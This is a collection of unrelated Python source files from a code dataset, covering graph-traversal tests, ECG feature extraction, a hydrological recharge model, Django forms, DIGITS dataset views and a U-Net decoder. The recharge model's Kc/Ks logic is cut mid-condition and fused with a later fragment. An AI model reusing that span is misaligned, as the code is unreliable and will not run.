database=\"mapptrapdb\")\n# cursor = conn.cursor()\n\n# cursor.execute(\"SELECT top 10 * FROM tblmappviolations\")\n# row = cursor.fetchone()\n\n# conn.close()\n\n# print(row)\n\n\nnumbers = list(range(1, 100))\n\ndef Fizz(i):\n if i % 5 == 0 and i % 3 == 0: \n print('FizzBizz')\n elif i % 3 == 0:\n print('Fizz')\n elif i % 5 == 0:\n print('Bizz')\n else:\n print(i)\n\nfor x in numbers:\n Fizz(x)\n\n\n\n","sub_path":"DiffMatching/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"433933854","text":"'''' unit testing for graph_transversal module'''\nimport unittest\nfrom graphs.model import DirectedGraph\nimport graphs.transversal.bfs as bfs\n\n\nclass TestDirectedGraphTransversal(unittest.TestCase):\n ''' test bfs for directed graph '''\n def test_directed_bfs(self):\n '''test standard bfs for directed graph case'''\n graph = DirectedGraph()\n graph.add_edge(0, 1)\n graph.add_edge(0, 2)\n graph.add_edge(1, 2)\n graph.add_edge(2, 4)\n 
graph.add_edge(3, 2)\n        graph.add_edge(3, 5)\n        graph.add_edge(4, 3)\n        graph.add_edge(5, 0)\n        lst = bfs.directed_bfs(graph)\n        self.assertEqual(lst, [0, 1, 2, 4, 3, 5])\n\n    def test_directed_bfs_only1(self):\n        '''test bfs for directed graph case with only one edge'''\n        graph = DirectedGraph()\n        graph.add_edge(0, 1)\n        lst = bfs.directed_bfs(graph)\n        self.assertEqual(lst, [0, 1])\n\n    def test_directed_bfs_empty(self):\n        '''test bfs for directed graph case with no edges'''\n        graph = DirectedGraph()\n        lst = bfs.directed_bfs(graph)\n        self.assertEqual(lst, [])\n","sub_path":"tests/transversal/test_bfs.py","file_name":"test_bfs.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"297824722","text":"#External modules\nimport hashlib\nimport sys\n\ndef get_file_md5(fname, show_prints):\n    #Reference: https://stackoverflow.com/questions/3431825/generating-an-md5-checksum-of-a-file\n    hash_md5 = hashlib.md5()\n    with open(fname, \"rb\") as f:\n        for chunk in iter(lambda: f.read(4096), b\"\"):\n            hash_md5.update(chunk)\n    hash_value = hash_md5.hexdigest()\n    if show_prints:\n        print(f'Hash value generated. Hash {hash_value}', file=sys.stdout)\n    return hash_value\n","sub_path":"md5_generator.py","file_name":"md5_generator.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"608154720","text":"import numpy as np\nfrom scipy.signal import argrelextrema\n\n\nclass Segment:\n    \"\"\"\n    A segment is a section of an ECG signal between two neighbouring R-peaks\n\n    ...\n    \n    Attributes\n    ----------\n    no_of_segments : int\n        an int representing the number of segments to overlay\n    \n    Methods\n    -------\n    combining_segments()\n        Combines multiple segments, overlayed on each other\n    find_features_lower()\n        Finds the lower unique features of a segment\n    find_features_higher()\n        Finds the higher unique features of a segment\n    \"\"\"\n\n    no_of_segments = 5\n\n    def __init__(self, bio_signal):\n        \"\"\"\n        Parameters\n        ----------\n        bio_signal : BiometricSignal\n            An ECG signal object\n        combined_seg : numpy.ndarray\n            Contains multiple segments overlayed on each other \n        features_lower() : tuple\n            The lower side unique features of a segment\n        features_higher() : tuple\n            The higher side unique features of a segment\n        \"\"\"\n\n        self.bio_signal = bio_signal\n        self.combined_seg = self.combining_segments()\n        self.features_lower = self.find_features_lower()\n        self.features_higher = self.find_features_higher()\n\n    def combining_segments(self):\n        r\"\"\"Combines multiple segments, overlayed on one another\n\n        This function combines multiple neighbouring R-peaks and overlays them\n        to form a single segment. 
This is an average over multiple segments.\n        \n        Returns\n        -------\n        combined_seg : numpy.ndarray\n            A numpy array containing multiple segments overlayed on one another\n        \"\"\"\n\n        combined_seg_does_not_exist = True\n        smallest_seg = None\n\n        for i in range(0, self.no_of_segments):\n            segment_start = self.bio_signal.r_peaks[0][i]\n            segment_end = self.bio_signal.r_peaks[0][i + 1]\n\n            extracted_segment = self.bio_signal.standardised_signal[\n                segment_start:segment_end\n            ]\n            if smallest_seg is None:\n                smallest_seg = len(extracted_segment)\n            elif len(extracted_segment) < smallest_seg:\n                smallest_seg = len(extracted_segment)\n\n            if combined_seg_does_not_exist:\n                # adds additional zeros to the end of the first segment\n                # this is to prevent a crash as segments may have different lengths\n                combined_seg = np.zeros(len(extracted_segment) + 100)\n                combined_seg_does_not_exist = False\n            for j in range(0, len(extracted_segment)):\n                combined_seg[j] = combined_seg[j] + extracted_segment[j]\n\n        combined_seg = np.trim_zeros(combined_seg)\n        combined_seg = combined_seg[0:smallest_seg]\n        return combined_seg\n\n    def find_features_lower(self):\n        r\"\"\"Finds the lower unique features of a segment\n\n        This function uses argrelextrema, part of SciPy. Argrelextrema\n        calculates the relative extrema of data; this means it examines\n        data at either side of a point on the segment to identify variation.\n        When it finds broad variations between points, it considers it unique, \n        labels that point as a feature and stores it in a tuple.\n        \n        Returns\n        -------\n        features_lower : tuple\n            A tuple containing the positions of lower unique features. \n        \"\"\"\n\n        features_lower = argrelextrema(self.combined_seg, np.less, order=5)\n        self.features_lower = (features_lower[0], self.combined_seg[features_lower[0]])\n        return self.features_lower\n\n    def find_features_higher(self):\n        r\"\"\"Finds the higher unique features of a segment\n\n        This function uses argrelextrema, part of SciPy. Argrelextrema\n        calculates the relative extrema of data; this means it examines\n        data at either side of a point on the segment to identify variation.\n        When it finds broad variations between points, it considers it unique, \n        labels that point as a feature and stores it in a tuple.\n        \n        Returns\n        -------\n        features_higher : tuple\n            A tuple containing the positions of higher unique features. 
\n \"\"\"\n\n features_higher = argrelextrema(self.combined_seg, np.greater, order=5)\n self.features_higher = (\n features_higher[0],\n self.combined_seg[features_higher[0]],\n )\n return self.features_higher\n","sub_path":"Segment.py","file_name":"Segment.py","file_ext":"py","file_size_in_byte":4527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"403637515","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Sep 10 11:20:45 2019\r\n\r\n@author: USER\r\n\"\"\"\r\nimport os\r\nimport warnings\r\nwarnings.filterwarnings('ignore')\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom PyQt5.QtWidgets import QProgressBar\r\nfrom models.exceptions import InvalidExtensionError, IncompleteInitialParameters, InvalidModelFile\r\nfrom models.utilities import printProgressBar\r\n\r\n\r\nclass SambaModel():\r\n \r\n EXPECTED_INPUT_VARIABLES = ('day','month','year','J','Rain','ETo')\r\n EXTENSIONS = ('.xlsx','.xls')\r\n INITIAL_GENERATED_VARIABLES = (\"Kc's\",'Zr','TAW','RAW','PE')\r\n GENERATED_VARIABLES = INITIAL_GENERATED_VARIABLES + ('RunCte','Runoff','Ks','AWE','AE','NSS','SMD','Rec',\"SMD'\")\r\n FINAL_DAY = None\r\n \r\n def __init__(self,model_path,**kwargs):\r\n \r\n if os.path.splitext(model_path)[1] in self.EXTENSIONS:\r\n self.model = pd.read_excel(model_path) if pd.read_excel(model_path).iloc[0].all() else None # checks if dummy row is appended to the model file \r\n self.crop_stages = kwargs['crop_stages']\r\n self.max_root_depth = kwargs['max_root_depth']\r\n self.soil = kwargs['soil']\r\n self.crop_coefficient = kwargs['crop_coefficient']\r\n self.run_off_matrix = kwargs['run_off_matrix']\r\n self.model_constant_params = kwargs['model_constant_params']\r\n self.crop_duration = kwargs['crop_duration']\r\n \r\n \r\n if self.model is None:\r\n raise InvalidModelFile('Dummy row not appended to model file')\r\n else:\r\n self.FINAL_DAY = self.model.index[-1]\r\n \r\n # initializaing the dummy row in the dataframe\r\n for variable in self.GENERATED_VARIABLES:\r\n self.model[variable] = None\r\n self.model[variable][0] = 0\r\n \r\n \r\n # setting the initial smd value\r\n self.model[\"SMD'\"][0] = self.model_constant_params['initial_smd']\r\n self.model[\"SMD'\"][1] = self.model_constant_params['initial_smd']\r\n else:\r\n raise InvalidExtensionError('File extension invalid')\r\n \r\n \r\n def generate_model(self):\r\n \r\n print('Loading......')\r\n self.generate_initial_variables()\r\n \r\n try:\r\n for i in self.model.index:\r\n index = i+1\r\n printProgressBar(index,len(self.model.index),prefix = 'Progress:', suffix = 'Complete',length=50)\r\n self.model[self.GENERATED_VARIABLES[5]][index] = self.get_run_off_coefficient(index)\r\n self.model[self.GENERATED_VARIABLES[6]][index] = self.get_runoff(index)\r\n self.model[self.GENERATED_VARIABLES[7]][index] = self.get_ks(index)\r\n self.model[self.GENERATED_VARIABLES[8]][index] = self.get_average_water_evapotranspiration(index)\r\n self.model[self.GENERATED_VARIABLES[9]][index] = self.get_average_evatranspiration(index)\r\n self.model[self.GENERATED_VARIABLES[10]][index] = self.get_nss(index)\r\n self.model[self.GENERATED_VARIABLES[11]][index] = self.get_smd(index)\r\n self.model[self.GENERATED_VARIABLES[12]][index] = self.get_recharge(index)\r\n self.model[self.GENERATED_VARIABLES[13]][index+1] = self.get_smd_prime(index) \r\n except Exception:\r\n pass\r\n finally:\r\n self.model[self.GENERATED_VARIABLES[5]][self.FINAL_DAY] = self.get_run_off_coefficient(self.FINAL_DAY)\r\n 
self.model[self.GENERATED_VARIABLES[6]][self.FINAL_DAY] = self.get_runoff(self.FINAL_DAY)\r\n self.model[self.GENERATED_VARIABLES[7]][self.FINAL_DAY] = self.get_ks(self.FINAL_DAY)\r\n self.model[self.GENERATED_VARIABLES[8]][self.FINAL_DAY] = self.get_average_water_evapotranspiration(self.FINAL_DAY)\r\n self.model[self.GENERATED_VARIABLES[9]][self.FINAL_DAY] = self.get_average_evatranspiration(self.FINAL_DAY)\r\n self.model[self.GENERATED_VARIABLES[10]][self.FINAL_DAY] = self.get_nss(self.FINAL_DAY)\r\n self.model[self.GENERATED_VARIABLES[11]][self.FINAL_DAY] = self.get_smd(self.FINAL_DAY)\r\n self.model[self.GENERATED_VARIABLES[12]][self.FINAL_DAY] = self.get_recharge(self.FINAL_DAY)\r\n \r\n # delete the first dummy row\r\n self.model = self.model.drop(self.model.index[0])\r\n \r\n def generate_initial_variables(self):\r\n \r\n \r\n '''\r\n This generates the variables that are not dependent on the initial SMD value\r\n \r\n @ variables\r\n - Kc's : crop coefficients\r\n - Zr : root depth\r\n - TAW : Total Available Water\r\n - RAW : Readily Available Water\r\n - PE : Potential Evapotranspiration\r\n '''\r\n \r\n if set(self.EXPECTED_INPUT_VARIABLES).issubset(set(self.model.columns)):\r\n \r\n for variable_column in self.INITIAL_GENERATED_VARIABLES: \r\n \r\n if variable_column == \"Kc's\":\r\n julian_days = self.model['J'].values\r\n for index,julian_day in list(enumerate(julian_days)):\r\n if self.crop_stages['planting']<= julian_day < self.crop_stages['development']:\r\n self.model[variable_column][index] = self.crop_coefficient['middle']\r\n elif self.crop_stages['development']<= julian_day < self.crop_stages['middle']:\r\n self.model[variable_column][index] = self.crop_coefficient['initial']+(julian_day-self.crop_stages['development'])/self.crop_duration['development']*(self.crop_coefficient['middle']-self.crop_coefficient['initial'])\r\n elif self.crop_stages['middle']<=julian_day= taw:\r\n ks_value = 0\r\n \r\n elif smd_prime > taw * self.model_constant_params['depletion_factor']:\r\n ks_value = round((taw-smd_prime)/(taw-taw*self.model_constant_params['depletion_factor']),2)\r\n\r\n else:\r\n ks_value = 1\r\n \r\n return ks_value\r\n \r\n def get_average_water_evapotranspiration(self,index):\r\n \r\n \r\n '''\r\n returns the average water evapotranspiration for a particular julian day \r\n '''\r\n \r\n rainfall_intensity = self.model['Rain'][index]\r\n runoff = self.model['Runoff'][index]\r\n nss = 0 if self.model['NSS'][index-1] is None else self.model['NSS'][index-1]\r\n smd_prime = self.model[\"SMD'\"][index-1]\r\n awe_value = None\r\n \r\n if smd_prime > 0:\r\n awe_value = rainfall_intensity - runoff + nss\r\n else:\r\n awe_value = rainfall_intensity - runoff \r\n return awe_value\r\n \r\n \r\n def get_average_evatranspiration(self,index):\r\n \r\n '''\r\n returns the average evapotranspiration for a particular julian day \r\n '''\r\n \r\n \r\n awe_value = self.model['AWE'][index]\r\n pe_value = self.model['PE'][index]\r\n taw_value = self.model['TAW'][index]\r\n ks_value = self.model['Ks'][index]\r\n smd_prime = self.model[\"SMD'\"][index]\r\n depletion_factor = self.model_constant_params['depletion_factor']\r\n ae_value = None\r\n \r\n if smd_prime < taw_value * depletion_factor:\r\n ae_value = pe_value \r\n elif awe_value >= pe_value:\r\n ae_value = pe_value\r\n elif smd_prime >= taw_value :\r\n ae_value = awe_value\r\n elif smd_prime < taw_value:\r\n ae_value = awe_value + ks_value*(pe_value - awe_value)\r\n \r\n return ae_value\r\n \r\n \r\n def get_nss(self,index):\r\n \r\n '''\r\n returns the nss for a particular julian day 
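\r\n\r\n For example (illustrative numbers, not taken from any real input):\r\n with AWE = 10, AE = 4, SMD' = 8 and nss_fraction = 0.2, the surplus\r\n 10 - 4 = 6 does not exceed SMD', so NSS = max(6 * 0.2, 0) = 1.2.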
\r\n '''\r\n \r\n awe_value = self.model['AWE'][index]\r\n ae_value = self.model['AE'][index]\r\n smd_prime = self.model[\"SMD'\"][index]\r\n nss_value = None\r\n nss_fraction = self.model_constant_params['nss_fraction']\r\n \r\n if awe_value - ae_value > smd_prime:\r\n nss_value = 0\r\n else:\r\n nss_value = max((awe_value-ae_value)*nss_fraction,0)\r\n \r\n return nss_value\r\n \r\n def get_smd(self,index):\r\n \r\n '''\r\n returns the smd value for a particular julian day \r\n '''\r\n awe_value = self.model['AWE'][index]\r\n nss_value = self.model['NSS'][index]\r\n ae_value = self.model['AE'][index]\r\n smd_prime = self.model[\"SMD'\"][index] \r\n \r\n smd_value = smd_prime+ae_value - awe_value + nss_value\r\n return smd_value \r\n \r\n def get_recharge(self,index):\r\n \r\n \r\n '''\r\n returns the recharge value for a particular julian day \r\n '''\r\n \r\n smd_value = self.model['SMD'][index]\r\n nss_value = self.model['NSS'][index]\r\n recharge = None\r\n \r\n if smd_value < 0:\r\n recharge = ((-1)*smd_value)+nss_value\r\n else:\r\n recharge = 0\r\n \r\n return recharge\r\n \r\n def get_smd_prime(self,index):\r\n \r\n '''\r\n returns the smd for the next julian day \r\n '''\r\n \r\n smd_prime = None\r\n smd_value = self.model['SMD'][index]\r\n recharge = self.model['Rec'][index]\r\n \r\n if smd_value < 0:\r\n smd_prime = 0\r\n else:\r\n smd_prime = smd_value + recharge\r\n \r\n return smd_prime\r\n \r\n def load_visualization(self,visualization_type):\r\n \r\n if visualization_type == 'SMD':\r\n julian_days = self.model['J'].values\r\n runoff = self.model['Runoff'].values\r\n taw = self.model['TAW'].values\r\n smd = self.model['SMD'].values\r\n rainfall = self.model['Rain'].values\r\n \r\n return { 'visualization_type':visualization_type,\r\n 'julian_days':julian_days,\r\n 'runoff':runoff,\r\n 'taw':taw,\r\n 'smd':smd,\r\n 'rainfall':rainfall}\r\n \r\n \r\n elif visualization_type == 'Monthly precipitation' :\r\n monthly_precipitation = {}\r\n months = ('Jan','Feb','Mar','Apr','May','Jun','Jul','Aug','Sep','Oct','Nov','Dec')\r\n \r\n for index, month in enumerate(months):\r\n monthly_precipitation[month] = sum(self.model.loc[self.model['month'] == index + 1].Rain)\r\n \r\n y_pos = np.arange(len(months))\r\n \r\n return {'visualization_type':visualization_type,\r\n 'months':months,\r\n 'y_pos':y_pos,\r\n 'monthly_precipitation':monthly_precipitation}\r\n \r\n \r\n elif visualization_type == 'Evapotranspiration':\r\n julian_days = self.model['J'].values\r\n eto = self.model['ETo'].values\r\n pe = self.model['PE'].values\r\n ae = self.model['AE'].values\r\n \r\n return{'visualization_type':visualization_type,\r\n 'julian_days':julian_days,\r\n 'eto':eto,\r\n 'pe':pe,\r\n 'ae':ae}\r\n elif visualization_type == 'Recharge/Runoff':\r\n julian_days = self.model['J'].values\r\n recharge = self.model['Rec'].values\r\n runoff = self.model['Runoff'].values\r\n \r\n return {'visualization_type':visualization_type,\r\n 'julian_days':julian_days,\r\n 'recharge':recharge,\r\n 'runoff':runoff}\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n ","sub_path":"models/model_v2.py","file_name":"model_v2.py","file_ext":"py","file_size_in_byte":16587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"58431848","text":"from django import forms\nfrom . 
import models\nfrom django.contrib.auth.models import User\n\n\nclass create_post(forms.ModelForm):\n\tclass Meta:\n\t\tmodel=models.Post\n\t\tfields=['title','slug','description','release_date','language','tags','image']\n\nclass create_comment(forms.ModelForm):\n\tpost_obj=forms.ModelChoiceField(\n\t\twidget=forms.HiddenInput,\n\t\tdisabled=True,\n\t\tqueryset=models.Post.objects.all()\n\t)\n\tuser_obj=forms.ModelChoiceField(\n\t\twidget=forms.HiddenInput,\n\t\tdisabled=True,\n\t\tqueryset=User.objects.all()\n\t)\n\tclass Meta:\n\t\tmodel = models.Comment\n\t\tfields = ['post_obj','user_obj','comment_title','ratings','body']","sub_path":"blogs/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"208804009","text":"# Copyright (c) 2014-2015, NVIDIA CORPORATION. All rights reserved.\n\nimport os\nimport shutil\n\nfrom flask import render_template, request, redirect, url_for, flash\n\nfrom digits import utils\nfrom digits.config import config_option\nfrom digits.webapp import app, scheduler\nfrom digits.dataset import tasks\nfrom forms import ImageClassificationDatasetForm\nfrom job import ImageClassificationDatasetJob\n\nNAMESPACE = '/datasets/images/classification'\n\ndef from_folders(job, form):\n \"\"\"\n Add tasks for creating a dataset by parsing folders of images\n \"\"\"\n job.labels_file = utils.constants.LABELS_FILE\n\n ### Add ParseFolderTask\n\n percent_val = form.folder_pct_val.data\n val_parents = []\n if form.has_val_folder.data:\n percent_val = 0\n\n percent_test = form.folder_pct_test.data\n test_parents = []\n if form.has_test_folder.data:\n percent_test = 0\n\n parse_train_task = tasks.ParseFolderTask(\n job_dir = job.dir(),\n folder = form.folder_train.data,\n percent_val = percent_val,\n percent_test = percent_test,\n )\n job.tasks.append(parse_train_task)\n\n # set parents\n if not form.has_val_folder.data:\n val_parents = [parse_train_task]\n if not form.has_test_folder.data:\n test_parents = [parse_train_task]\n\n if form.has_val_folder.data:\n parse_val_task = tasks.ParseFolderTask(\n job_dir = job.dir(),\n parents = parse_train_task,\n folder = form.folder_val.data,\n percent_val = 100,\n percent_test = 0,\n )\n job.tasks.append(parse_val_task)\n val_parents = [parse_val_task]\n\n if form.has_test_folder.data:\n parse_test_task = tasks.ParseFolderTask(\n job_dir = job.dir(),\n parents = parse_train_task,\n folder = form.folder_test.data,\n percent_val = 0,\n percent_test = 100,\n )\n job.tasks.append(parse_test_task)\n test_parents = [parse_test_task]\n\n ### Add CreateDbTasks\n\n encode = form.encode_images.data\n\n job.tasks.append(\n tasks.CreateDbTask(\n job_dir = job.dir(),\n parents = parse_train_task,\n input_file = utils.constants.TRAIN_FILE,\n db_name = utils.constants.TRAIN_DB,\n image_dims = job.image_dims,\n resize_mode = job.resize_mode,\n encode = encode,\n mean_file = utils.constants.MEAN_FILE_CAFFE,\n labels_file = job.labels_file,\n )\n )\n\n if percent_val > 0 or form.has_val_folder.data:\n job.tasks.append(\n tasks.CreateDbTask(\n job_dir = job.dir(),\n parents = val_parents,\n input_file = utils.constants.VAL_FILE,\n db_name = utils.constants.VAL_DB,\n image_dims = job.image_dims,\n resize_mode = job.resize_mode,\n encode = encode,\n labels_file = job.labels_file,\n )\n )\n\n if percent_test > 0 or form.has_test_folder.data:\n job.tasks.append(\n tasks.CreateDbTask(\n job_dir = job.dir(),\n parents = test_parents,\n 
input_file = utils.constants.TEST_FILE,\n db_name = utils.constants.TEST_DB,\n image_dims = job.image_dims,\n resize_mode = job.resize_mode,\n encode = encode,\n labels_file = job.labels_file,\n )\n )\n\ndef from_files(job, form):\n \"\"\"\n Add tasks for creating a dataset by reading textfiles\n \"\"\"\n ### labels\n\n request.files[form.textfile_labels_file.name].save(\n os.path.join(job.dir(), utils.constants.LABELS_FILE)\n )\n job.labels_file = utils.constants.LABELS_FILE\n\n\n ### train\n\n request.files[form.textfile_train_images.name].save(\n os.path.join(job.dir(), utils.constants.TRAIN_FILE)\n )\n\n image_folder = form.textfile_train_folder.data.strip()\n if not image_folder:\n image_folder = None\n\n job.tasks.append(\n tasks.CreateDbTask(\n job_dir = job.dir(),\n input_file = utils.constants.TRAIN_FILE,\n db_name = utils.constants.TRAIN_DB,\n image_dims = job.image_dims,\n image_folder= image_folder,\n resize_mode = job.resize_mode,\n mean_file = utils.constants.MEAN_FILE_CAFFE,\n labels_file = job.labels_file,\n )\n )\n\n ### val\n\n if form.textfile_use_val.data:\n request.files[form.textfile_val_images.name].save(\n os.path.join(job.dir(), utils.constants.VAL_FILE)\n )\n\n image_folder = form.textfile_val_folder.data.strip()\n if not image_folder:\n image_folder = None\n\n job.tasks.append(\n tasks.CreateDbTask(\n job_dir = job.dir(),\n input_file = utils.constants.VAL_FILE,\n db_name = utils.constants.VAL_DB,\n image_dims = job.image_dims,\n image_folder= image_folder,\n resize_mode = job.resize_mode,\n labels_file = job.labels_file,\n )\n )\n\n ### test\n\n if form.textfile_use_test.data:\n request.files[form.textfile_test_images.name].save(\n os.path.join(job.dir(), utils.constants.TEST_FILE)\n )\n\n image_folder = form.textfile_test_folder.data.strip()\n if not image_folder:\n image_folder = None\n\n job.tasks.append(\n tasks.CreateDbTask(\n job_dir = job.dir(),\n input_file = utils.constants.TEST_FILE,\n db_name = utils.constants.TEST_DB,\n image_dims = job.image_dims,\n image_folder= image_folder,\n resize_mode = job.resize_mode,\n labels_file = job.labels_file,\n )\n )\n\n\n@app.route(NAMESPACE + '/new', methods=['GET'])\ndef image_classification_dataset_new():\n form = ImageClassificationDatasetForm()\n return render_template('datasets/images/classification/new.html', form=form)\n\n@app.route(NAMESPACE, methods=['POST'])\ndef image_classification_dataset_create():\n form = ImageClassificationDatasetForm()\n if not form.validate_on_submit():\n return render_template('datasets/images/classification/new.html', form=form), 400\n\n job = None\n try:\n job = ImageClassificationDatasetJob(\n name = form.dataset_name.data,\n image_dims = (\n int(form.resize_height.data),\n int(form.resize_width.data),\n int(form.resize_channels.data),\n ),\n resize_mode = form.resize_mode.data\n )\n\n if form.method.data == 'folder':\n from_folders(job, form)\n\n elif form.method.data == 'textfile':\n from_files(job, form)\n\n scheduler.add_job(job)\n return redirect(url_for('datasets_show', job_id=job.id()))\n\n except:\n if job:\n scheduler.delete_job(job)\n raise\n\ndef show(job):\n \"\"\"\n Called from digits.dataset.views.datasets_show()\n \"\"\"\n return render_template('datasets/images/classification/show.html', job=job)\n\n","sub_path":"digits/dataset/images/classification/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"15160529","text":"import 
json\nimport os\nimport shutil\n\nimport status\n\n# -------------------------------------------------------------------------------\n# \n# Make config.json file for each tutorial with meta info\n#\n# - config.userguide_chapter_name : breadcrumb header label\n# - config.tags.title : page title\n# - config.tags.meta_description : meta description\n#\n# -------------------------------------------------------------------------------\n\nNAME=\"make_config\" # name of this script\n\n\n# Get from <head>\ndef get_config_title(head, flags):\n Title = head.findAll('title')\n if not len(Title):\n flags += ['no-title']\n title = \"\"\n elif len(Title)>1:\n flags += ['multiple-titles']\n title = Title[-1].string.replace(\"\\n\",'')\n else:\n title = Title[0].string.replace(\"\\n\",'')\n return title, flags\n\n# Get <meta name=\"description\" > \ndef get_config_meta_description(head, flags):\n Meta = head.findAll('meta')\n Meta_description = [meta for meta in Meta \n if (meta.has_attr('name') and \n meta['name']==\"description\")]\n if not len(Meta_description):\n flags += ['no-meta_description']\n meta_description = \"\"\n elif len(Meta_description)>1:\n flags += ['multiple-meta_descriptions']\n meta_description = Meta_description[-1]['content'].replace(\"\\n\",'')\n else:\n meta_description = Meta_description[0]['content'].replace(\"\\n\",'')\n return meta_description, flags\n\n# Get tutorial name (for breadcrumb) \ndef get_config_tutorial_name(head, flags): #TODO generalize!\n tutorial_name = '' \n flags += ['no-tutorial_name']\n return tutorial_name, flags\n\n# Check if config.json in tree was modified\ndef check_tree_config(tree, config, flags):\n try:\n path_config = os.path.join(tree,'config.json')\n with open(path_config) as f:\n config_old = json.load(f)\n if config_old != config:\n config = config_old\n status.log(NAME,(\n \"Not overwriting `{}`, as modifications were found\"\n ).format(path_config))\n flags = ['show-config']\n if not config['tags']['title']: flags += ['no-title'] \n if not config['tags']['meta_description']: flags += ['no-meta_description'] \n if not config['tutorial_name']: flags += ['no-tutorial_name'] \n except:\n pass\n return config, flags\n\n# Print important flags to screen\ndef print_flags(flags, config, path_html, tree):\n for flag in flags:\n if flag=='show-config':\n status.log(NAME,(\n \"{}/config.json ['tutorial_name']:\\n\\t'{}'\"\n ).format(tree,config['tutorial_name']))\n status.log(NAME,(\n \"{}/config.json ['tags']['title']:\\n\\t'{}'\"\n ).format(tree,config['tags']['title']))\n status.log(NAME,(\n \"{}/config.json ['tags']['meta_description']:\\n\\t'{}'\"\n ).format(tree,config['tags']['meta_description']))\n elif flag=='no-title': \n status.important(NAME,(\n \"There is no <title>\\nin `{}`.\\n\"\n \"Please fill in\\n`{}/config.json`\"\n ).format(path_html,tree))\n elif flag=='multiple-titles':\n status.important(NAME,(\n \"There is more than one <title>\\nin `{}`.\\n\"\n \"Picking the last one for\\n`{}/config.json`\"\n ).format(path_html,tree))\n status.log(NAME,(\n 'With last <title> tag, set meta '\n 'title to \"{}\"'\n ).format(config['tags']['title']))\n elif flag=='no-meta_description':\n status.important(NAME,(\n \"There is no <meta name='description'> in\\n`{}`.\\n\"\n \"Please fill in\\n`{}/config.json`\"\n ).format(path_html,tree))\n elif flag=='multiple-meta_descriptions':\n status.important(NAME,(\n \"There is more than one <meta name='description'> in\\n`{}`.\\n\"\n \"Picking the last one for\\n`{}/config.json`\"\n 
).format(path_html,tree))\n status.log(NAME,(\n 'With last <meta name=\"description\"> tag, '\n 'set meta description to \"{}\"'\n ).format(config['tags']['meta_description']))\n elif flag=='no-tutorial_name':\n status.important(NAME,(\n \"Please fill 'tutorial_name' in\\n`{}/config.json`\"\n ).format(tree))\n else:\n status.log(NAME,(\n 'With <title> tag, set meta title to:\\n\\t\"{}\"'\n ).format(config['tags']['title']))\n status.log(NAME,(\n 'With <meta name=\"description\"> tag, set meta description to:\\n\\t\"{}\"'\n ).format(config['tags']['meta_description']))\n return\n\n# -------------------------------------------------------------------------------\n\n# Make config dictionaries (don't print it here!)\ndef make_config(head, path_html, tree):\n flags = []\n title, flags = get_config_title(head, flags)\n meta_description, flags = get_config_meta_description(head, flags)\n tutorial_name, flags = get_config_tutorial_name(head, flags)\n config = dict(\n tutorial_name=tutorial_name,\n tags=dict(title=title, meta_description=meta_description)\n )\n config, flags = check_tree_config(tree, config, flags)\n print_flags(flags, config, path_html, tree)\n return config\n","sub_path":"_scripts/make_config.py","file_name":"make_config.py","file_ext":"py","file_size_in_byte":5450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"640481994","text":"from functools import partial\nfrom typing import Union, Callable, List\n\nimport torch\nfrom pytorch_toolbelt.modules import ABN, ACT_RELU\nfrom pytorch_toolbelt.modules import encoders as E\nfrom pytorch_toolbelt.modules.decoders import DecoderModule\nfrom pytorch_toolbelt.modules.encoders import EncoderModule\nfrom torch import nn\nfrom torch.nn import functional as F\n\nfrom ..dataset import OUTPUT_MASK_KEY\n\n__all__ = [\"seresnext50_runet64\", \"hrnet18_runet64\", \"hrnet34_runet64\", \"hrnet48_runet64\", \"densenet121_runet64\"]\n\n\nclass ResidualDoubleConvRelu(nn.Module):\n def __init__(self, in_channels, out_channels):\n super().__init__()\n\n self.residual_path = (\n nn.Conv2d(in_channels, out_channels, kernel_size=1) if in_channels != out_channels else nn.Identity()\n )\n\n self.main_path = nn.Sequential(\n nn.Conv2d(in_channels, out_channels, 3, padding=1, bias=False),\n nn.BatchNorm2d(out_channels),\n nn.ReLU(inplace=True),\n nn.Conv2d(out_channels, out_channels, 3, padding=1, bias=False),\n nn.BatchNorm2d(out_channels),\n )\n\n def forward(self, x):\n skip = self.residual_path(x)\n x = self.main_path(x)\n return F.relu(skip + x, inplace=True)\n\n\nclass RUnetBottleneckBlock(nn.Module):\n def __init__(self, in_channels, out_channels, block=ResidualDoubleConvRelu, num_blocks=1):\n super().__init__()\n\n blocks = []\n for i in range(num_blocks):\n blocks.append(block(in_channels, out_channels))\n in_channels = out_channels\n\n self.blocks = nn.Sequential(*blocks)\n\n def forward(self, dec, enc):\n x = torch.cat([dec, enc], dim=1)\n x = self.blocks(x)\n return x\n\n\nclass RUnetDecoderBlock(nn.Module):\n def __init__(self, in_channels, middle_channels, out_channels):\n super().__init__()\n self.layer = nn.Sequential(\n nn.Upsample(scale_factor=2),\n nn.Conv2d(in_channels, out_channels, 3, padding=1, bias=False),\n nn.BatchNorm2d(out_channels),\n nn.ReLU(inplace=True),\n )\n\n def forward(self, x):\n return self.layer(x)\n\n\nclass RUNetDecoderV2(DecoderModule):\n def __init__(\n self,\n feature_maps: List[int],\n decoder_features: List[int],\n runet_blocks: List[int],\n mask_channels: 
